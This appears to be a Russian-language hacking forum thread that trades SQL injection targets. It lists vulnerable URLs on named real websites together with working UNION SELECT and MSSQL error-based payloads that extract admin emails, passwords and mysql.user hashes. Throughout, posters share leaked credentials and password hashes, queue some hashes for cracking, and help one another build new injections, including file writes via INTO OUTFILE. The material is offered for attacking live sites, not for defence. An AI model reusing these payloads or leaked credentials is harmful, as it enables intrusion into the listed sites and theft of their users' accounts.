SQL Инъекции

http://www.preproject.com/news%20manager/admin/view_news.php?catid=[sql]

http://www.preproject.com/news%20manager/index.php?id=[sql]

ps скуля в демо двиге!

 

http://auction.ua/auctions/one.htm?parent=-3242

 

Kumama:04f83a9025d99b309b427d9bde172fb7
Stiltzkin:4e25f9875fd790f28dfc8e97da43aece:SailorV8
mognet.net/admin
mognet.net/forum/admin

 

user: [email protected]
db: astrey
version: 4.0.27

root0bcb2a3b366d4f3c
site5187d56e009fb910

Хэши не сбручены, но поставлены в очередь на hashcracking.info

 

Code:

http://www.itsecurityportal.com/itsecurity_directory.asp?SearchString=a%')+and+1=@@version--

Code:

http://www.itsecurityportal.com/itsecurity_job_detail.asp?jobid=111+and+1=@@version

на серве несколько сайтов, все они узявимы в этих сриптах, единственное что, это меняется самый первый префикс, в зависимости от имени сайта

 

Blind SQL/XPath injection for numeric inputs
http://www.video24.ru:80/PasswordRecovery.aspx

request data (post или get хз)

Code:

[email protected]&[email protected]&__VIEWSTATE=%2FwEPDwUJMzkxNjczNjExD2QWAmYPZBYEAgEPZBYIAgEPFgIeB2NvbnRlbnQFQFZpZGVvMjQgLSDQsNGA0LXQvdC00LAg0Lgg0L%2FQvtC60YPQv9C60LAg0LrQuNC90L4g0YTQuNC70YzQvNC%2B0LJkAgIPFgIfAAWAAtC60LjQvdC%2BINGE0LjQu9GM0LzRiyDRgdC60LDRh9Cw0YLRjCDQv9C%2B0YHQvNC%2B0YLRgNC10YLRjCDQsNGA0LXQvdC00LAg0LrRg9C%2F0LjRgtGMINGC0YDQtdC50LvQtdGA0Ysg0LrQvtC80LXQtNC40Lgg0LHQvtC10LLQuNC60Lgg0LzRg9C70YzRgtGE0LjQu9GM0LzRiyDRg9C20LDRgdGLICDRhNCw0L3RgtCw0YHRgtC40LrQsCDRjdGA0L7RgtC40LrQsCDRgdC10YDQuNCw0LvRiyDQsdC70L7QutCx0LDRgdGC0LXRgNGLINC%2F0YDQtdC80YzQtdGA0YtkAgMPFgIfAAX%2FAdC60LjQvdC%2BINGE0LjQu9GM0LzRiyDRgdC60LDRh9Cw0YLRjCDQv9C%2B0YHQvNC%2B0YLRgNC10YLRjCDQsNGA0LXQvdC00LAg0LrRg9C%2F0LjRgtGMINGC0YDQtdC50LvQtdGA0Ysg0LrQvtC80LXQtNC40Lgg0LHQvtC10LLQuNC60Lgg0LzRg9C70YzRgtGE0LjQu9GM0LzRiyDRg9C20LDRgdGLINGE0LDQvdGC0LDRgdGC0LjQutCwINGN0YDQvtGC0LjQutCwINGB0LXRgNC40LDQu9GLINCx0LvQvtC60LHQsNGB0YLQtdGA0Ysg0L%2FRgNC10LzRjNC10YDRi2QCBA8WAh8ABYMB0LrRg9C%2F0LjRgtGMINGE0LjQu9GM0Lwg0LDRgNC10L3QtNCwINGE0LjQu9GM0LzQsCDRgdC60LDRh9Cw0YLRjCDRhNC40LvRjNC8INC%2F0L7RgdC70LXQtNC90LjQtSDRhNC40LvRjNC80Ysg0L3QvtCy0YvQtSDRhNC40LvRjNC80YtkAgMPZBYQAgQPZBYCAgEPZBYCZg9kFgQCAQ8WAh4EVGV4dAXlAdCi0LDQutC%2B0Lkg0L%2FQvtC70YzQt9C%2B0LLQsNGC0LXQu9GMINC90LUg0YHRg9GJ0LXRgdGC0LLRg9C10YIuPGJyLz7Qn9C%2B0L%2FRgNC%2B0LHRg9C50YLQtSDQtdGJ0LUsINC40LvQuCDQvtCx0YDQsNGC0LjRgtC10YHRjCDQsiDRgdC70YPQttCx0YMg0YLQtdGF0L3QuNGH0LXRgdC60L7QuSA8YSBzdHlsZT0iY29sb3I6b3JhbmdlOyIgaHJlZj0iU3VwcG9ydC5hc3B4Ij7Qv9C%2B0LTQtNC10YDQttC60Lg8YT5kAgUPZBYEAgEPDxYCHghJbWFnZVVybAVNfi9DYXB0Y2hhSW1hZ2UuYXNweD9ndWlkPTdmY2E2MzdhNjcyYzRhMjZiOWNkYzMzYzkzODQwMTg2JndpZHRoPTIwMCZoZWlnaHQ9NzBkZAIDDw9kFgIeCm9ua2V5cHJlc3MFNnJldHVybiBjbGlja09uRW50ZXIodGhpcywnY3RsMDBfY3BoQ29udGVudF9SZWNvdmVyeScpO2QCBg8PFgIeB1Zpc2libGVnZBYEZg8WAh8BZWQCAQ8WAh8BBYUBPGlmcmFtZSBjbGFzcz0nJyBzdHlsZT0naGVpZ2h0OjIyMHB4O3dpZHRoOjE4MHB4OycgZnJhbWVib3JkZXI9MCBzY3JvbGxpbmc9bm8gc3JjPSdodHRwOi8vdmlkZW8yNC5ydS9kYXRhL2FkdnMvNi9pbmRleC5odG0nPjwvaWZyYW1lPmQCCA9kFgICAQ8WAh4LXyFJdGVtQ291bnQCChYUZg9kFgJmDxULACLQn9Cw0YDQuNC2LCDRjyDQu9GO0LHQu9GOINGC0LXQsdGPAzEwMAMxMDAi0J%2FQsNGA0LjQtiwg0Y8g0LvRjtCx0LvRjiDRgtC10LHRjwMxMDAi0J%2FQsNGA0LjQtiwg0Y8g0LvRjtCx0LvRjiDRgtC10LHRjwMxMDADMTAwCTQ5INGA0YPQsQk0OSDRgNGD0LFkAgEPZBYCZg8VCwRIaWdoI9CS0L3Rg9GC0YDQtdC90L3Rj9GPINC40LzQv9C10YDQuNGPAjIyAjIyI9CS0L3Rg9GC0YDQtdC90L3Rj9GPINC40LzQv9C10YDQuNGPAjIyI9CS0L3Rg9GC0YDQtdC90L3Rj9GPINC40LzQv9C10YDQuNGPAjIyAjIyCTQ5INGA0YPQsQk0OSDRgNGD0LFkAgIPZBYCZg8VCwAY0KPQu9GM0YLRgNCw0YTQuNC%
2B0LvQtdGCAjY3AjY3GNCj0LvRjNGC0YDQsNGE0LjQvtC70LXRggI2NxjQo9C70YzRgtGA0LDRhNC40L7Qu9C10YICNjcCNjcJNDkg0YDRg9CxCTQ5INGA0YPQsWQCAw9kFgJmDxULBEhpZ2gK0JLRi9C60YPQvwM0NzQDNDc0CtCS0YvQutGD0L8DNDc0CtCS0YvQutGD0L8DNDc0AzQ3NAk0OSDRgNGD0LEJNDkg0YDRg9CxZAIED2QWAmYPFQsADtCg0YPRgdCw0LvQutCwAzE3MAMxNzAO0KDRg9GB0LDQu9C60LADMTcwDtCg0YPRgdCw0LvQutCwAzE3MAMxNzAJNDkg0YDRg9CxCTQ5INGA0YPQsWQCBQ9kFgJmDxULBEhpZ2gR0K8g0L7RgdGC0LDRjtGB0YwDMzY4AzM2OBHQryDQvtGB0YLQsNGO0YHRjAMzNjgR0K8g0L7RgdGC0LDRjtGB0YwDMzY4AzM2OAk0OSDRgNGD0LEJNDkg0YDRg9CxZAIGD2QWAmYPFQsAJNCb0LjQutCy0LjQtNCw0YbQuNGPICjRgdC10YDQuNGPICAxKQM0NTMDNDUzJNCb0LjQutCy0LjQtNCw0YbQuNGPICjRgdC10YDQuNGPICAxKQM0NTMk0JvQuNC60LLQuNC00LDRhtC40Y8gKNGB0LXRgNC40Y8gIDEpAzQ1MwM0NTMJNDkg0YDRg9CxCTQ5INGA0YPQsWQCBw9kFgJmDxULBEhpZ2gs0J3QsNC%2F0LDQtNC10L3QuNC1INC90LAgMTMt0Lkg0YPRh9Cw0YHRgtC%2B0LoDNTQ4AzU0OCzQndCw0L%2FQsNC00LXQvdC40LUg0L3QsCAxMy3QuSDRg9GH0LDRgdGC0L7QugM1NDgs0J3QsNC%2F0LDQtNC10L3QuNC1INC90LAgMTMt0Lkg0YPRh9Cw0YHRgtC%2B0LoDNTQ4AzU0OAk0OSDRgNGD0LEJNDkg0YDRg9CxZAIID2QWAmYPFQsAJdCR0L7QuSDRgSDRgtC10L3RjNGOIDIgLSDQoNC10LLQsNC90YgCNDkCNDkl0JHQvtC5INGBINGC0LXQvdGM0Y4gMiAtINCg0LXQstCw0L3RiAI0OSXQkdC%2B0Lkg0YEg0YLQtdC90YzRjiAyIC0g0KDQtdCy0LDQvdGIAjQ5AjQ5CTQ5INGA0YPQsQk0OSDRgNGD0LFkAgkPZBYCZg8VCwRIaWdoH9Cg0L7QutC%2B0LLQsNGPINC60YDQsNGB0L7RgtC60LADNTI1AzUyNR%2FQoNC%2B0LrQvtCy0LDRjyDQutGA0LDRgdC%2B0YLQutCwAzUyNR%2FQoNC%2B0LrQvtCy0LDRjyDQutGA0LDRgdC%2B0YLQutCwAzUyNQM1MjUJNDkg0YDRg9CxCTQ5INGA0YPQsWQCCQ9kFgJmDxBkZBYAZAIKD2QWBGYPFgIfAWVkAgEPFgIfAWVkAgsPDxYCHwRnZGQCDA8PFgIfBGhkZAINDw8WBB8BBRLQmtC40L3QvtGC0LXQsNGC0YAeC05hdmlnYXRlVXJsBRhodHRwOi8vY2luZW1hLmxvY2FsaG9zdC9kZBgBBR9jdGwwMCRjcGhDb250ZW50JE11bHRpVmlld0Zvcm1zDw9kZmSgE12fR%2FaXraHX3N%2FRHjIlWVF1Dw%3D%3D&[email protected]&ctl00%[email protected]+and+1%3D0&ctl00%24cphContent%[email protected]&ctl00%24cphContent%24ctrlCaptcha%[email protected]&ctl00%24cphContent%[email protected]&__EVENTVALIDATION=%2FwEWCAKL55VmAsCH3ZkDAp3575QBAvTb06MHApf5r%2BgPAvKJmnkCvb2C%2BQkC9qacmAFWO%2BU%2BG8WwJuHrrDX%2BErr05%2B2fSQ%3D%3D

 

это чтото вроде админов или модеров но админку не нашёл ..
FrOz!:romanroman
FrA:mg2ymu

 

http://www.break-dance.it/pagine/italiano/community/log.php

 

помогите составить запрос, инекция после order и limit

SELECT p.*, a.id AS agentid, a.name AS agent, a.user AS user, c.name AS company, c.id AS companyid, t.name AS type, p.type AS typeid
FROM mos_hp_properties AS p, mos_hp_companies AS c
LEFT JOIN mos_hp_agents AS a ON p.agent = a.id
LEFT JOIN mos_hp_prop_types AS t ON p.type = t.id
LEFT JOIN mos_hp_featured AS f ON f.property = p.id
WHERE p.published='1' AND p.approved='1' AND t.published='1'
AND a.company=c.id
AND (publish_up = '0000-00-00 00:00:00' OR publish_up <= NOW())
AND (publish_down = '0000-00-00 00:00:00' OR publish_down >= NOW())
AND (p.name LIKE '%1%' OR p.address LIKE '%1%' OR p.suburb LIKE '%1%'
OR p.state LIKE '%1%' OR p.country LIKE '%1%' OR p.intro_text LIKE '%1%'
OR p.full_text LIKE '%1%')
AND p.type=1
ORDER BY p.price asc
LIMIT [sql]

 

После ORDER и LIMIT можно попробовать INTO OUTFILE '/path/to/file'

 

хз вроде движок какого-то онлайн магазина:

Code:

http://www.odissey.kiev.ua/index.php?fullnews=-1+union+select+1,2,3,4,5/*

Code:

http://shop.ghettostreet.ru/index.php?fullnews=-1+union+select+1,2,3,4,5/*

админка по адресу хттп://сайт/admin/

 

http://www.macspeech.com/

Code:

http://www.macspeech.com/pages.php?pID=-1+union+select+concat(admin_email_address,0x3a,admin_password)+from+admin/*

PR: 7

 

Code:

http://www.filmthreat.com/index.php?section=reviews&Id=9999999999999'/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,concat_ws(0x3a,user,password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+mysql.user+limit+0,1/*

5.0.27
by admin:4ba58ad82e059055

Code:

http://innovateonline.info/index.php?view=article&id=999999999/**/UNION/**/SELECT/**/version()/*

5.0.24a-community-nt

 

Code:

https://www.lina2.ru/clans/index.php?showclan=-1+union+select+login,password+from+accounts/*

loginass

парль зашифрован

base64_encode(pack('H*'sha1($apss)))

Схема БД(спасибо Scipio):

Code:

http://www.lina2.ru/clans/index.php?showclan=-268520741+union+select+concat(table_schema,0x3a,ta  ble_name,0x3a,column_name),null+from+information_s  chema.columns+where+table_schema+like+0x6C3225/*

 

4.1.20-log
кроме таблы news - ничего не нашёл .. пробил на 450 табл ..

 

mccormick-intl.com

acieap.com

annclarkassociates.com

afoundation.org.uk

picoworld.com

petees.com

 

Code:

http://rus.gflora.com/index.php?cmd=genus_body&genus_id=999999999/**/UNION/**/SELECT/**/concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10,11+from+mysql.user/*

root:*2825BE681C6102A9313382FB2405D76868BE5F32

 

кавычки экранируются слешем, ничего путного у меня не выходит(
может быть вы поможете?
функция char() отключена

 

imajo.ati

Там MSSQL т.е у тебя запрос изначально не верен
Вот версия
_http://kb.arena.ru/kill.php?char=nickname'%20or%201=@@version--
Дальше сам если надо

P.s Вопросы сдесь
_https://forum.antichat.ru/thread46016.html

 

Code:

http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+table_name+from+information_schema.tables)--

Получаем имя первой таблицы, через not+in+() получаем имена остальных таблиц, но так как стоит фильтр, то имена нужно кодировать, очень помог в этом Universal char SQL encoder by [53x]Shadow!

Таким образом находим таблицу tLogins, колонки стандартные - login, password, id.

Выводим результат:

Code:

http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+cast(login+as+nvarchar)%2Bcast(password+as+nvarchar)+from+tLogins)--

Логин и пароль сливаются, мускул ругается на +, ну впринцыпе и так покатит

Так как все символы хэша не выводятся, сначала выводим первые 30, а потом с помощью команды substring(str,begin,length) - возвращает подстроку str, начиная с begin символа по счету длиной численно равной length, выводим недостающие 2 символа:

Code:

http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+cast(login+as+nvarchar)%2Bcast(substring(password,2,2)+as+nvarchar)+from+tLogins)--

Перебирать логины через where+id=... у меня не получилось, опять ругается мускул, альтернатива: +where+login+not+in(), логины опять же кодируем.

The End.